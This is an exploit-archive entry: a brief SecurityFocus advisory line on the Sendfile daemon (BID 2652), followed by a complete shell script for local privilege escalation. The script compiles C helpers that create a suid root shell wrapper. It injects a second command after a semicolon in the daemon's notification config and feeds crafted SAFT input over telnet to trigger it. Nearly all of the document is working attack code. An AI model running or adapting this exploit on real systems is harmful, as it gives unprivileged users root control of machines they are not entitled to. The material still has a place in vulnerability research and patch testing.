118 lines
No EOL
2.7 KiB
Bash
Executable file
118 lines
No EOL
2.7 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/2652/info
|
|
|
|
Sendfile is an implementation of the SAFT (simple asynchronous file transfer) protocol for UNIX systems.
|
|
|
|
A serialization error exists in the Sendfile daemon, sendfiled. When used in conjunction with other problems found in the daemon, it may be possible for a local user to execute arbitrary commands as root and gain elevated privileges.
|
|
|
|
#!/bin/sh
|
|
#
|
|
# sfdnfy - Sendfile daemon local arbitrary command execution vulnerability
|
|
#
|
|
# references:
|
|
# https://www.securityfocus.com/bid/2652
|
|
# https://www.securityfocus.com/bid/2631
|
|
#
|
|
# 04/24/01 psheep
|
|
|
|
SFUSER=$USER
|
|
SFHOST=localhost
|
|
SFPORT=saft
|
|
SFSPOOL=/var/spool/sendfile
|
|
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
|
|
|
|
echo "Sendfile daemon local arbitrary command execution vulnerability"
|
|
echo
|
|
echo " username = $SFUSER"
|
|
echo " spool directory = $SFSPOOL"
|
|
echo " config file = $SFUSERCFG"
|
|
echo " target hostname = $SFHOST"
|
|
echo " target port = $SFPORT"
|
|
echo
|
|
|
|
if ! test -d $SFSPOOL; then
|
|
echo "** unable to locate the sendfile spool directory, exiting"
|
|
exit 1
|
|
fi
|
|
|
|
sfsavedcfg="no"
|
|
|
|
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
|
|
echo "** attempting to create sendfile spool directory for $SFUSER"
|
|
echo
|
|
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
|
|
echo
|
|
else
|
|
if test -f $SFUSERCFG; then
|
|
echo "** backing up your sendfile daemon configuration file"
|
|
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
|
|
sfsavedcfg="yes"
|
|
fi
|
|
fi
|
|
|
|
cat > sfdnfy.c << EOF
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
|
|
int main() {
|
|
setreuid(0,0);
|
|
setgid(0);
|
|
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
|
|
}
|
|
EOF
|
|
|
|
cat > sfdsh.c << EOF
|
|
#include <unistd.h>
|
|
|
|
int main() {
|
|
setreuid(0,0);
|
|
setgid(0);
|
|
execl("/bin/sh", "sh", NULL);
|
|
}
|
|
EOF
|
|
|
|
echo "** compiling helper application as $PWD/sfdnfy"
|
|
cc -o $PWD/sfdnfy $PWD/sfdnfy.c
|
|
|
|
if ! test -x $PWD/sfdnfy; then
|
|
echo "** compilation failed, exiting"
|
|
exit 1
|
|
fi
|
|
|
|
echo "** compiling shell wrapper as $PWD/sfdsh"
|
|
cc -o $PWD/sfdsh $PWD/sfdsh.c
|
|
|
|
if ! test -x $PWD/sfdsh; then
|
|
echo "** compilation failed, exiting"
|
|
exit 1
|
|
fi
|
|
|
|
echo "** inserting commands into temporary configuration file"
|
|
echo "notification = mail $USER;$PWD/sfdnfy" >$SFUSERCFG
|
|
|
|
echo "** attempting attack against sendfile daemon..."
|
|
echo
|
|
|
|
(sleep 1;cat << EOF
|
|
FROM $USER
|
|
TO $USER
|
|
FILE boom$RANDOM
|
|
SIZE 0 0
|
|
DATA
|
|
FILE boom$RANDOM
|
|
SIZE 1 0
|
|
DATA
|
|
EOF
|
|
sleep 2) | telnet $SFHOST $SFPORT
|
|
echo
|
|
|
|
if test "x$sfsavedcfg" = xyes; then
|
|
echo "** restoring backed up configuration file"
|
|
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
|
|
else
|
|
echo "** removing temporary configuration file"
|
|
rm $SFUSERCFG
|
|
fi
|
|
|
|
echo "** done, the shell wrapper should be suid root after the mailer is done"
|
|
echo
|
|
exit 1 |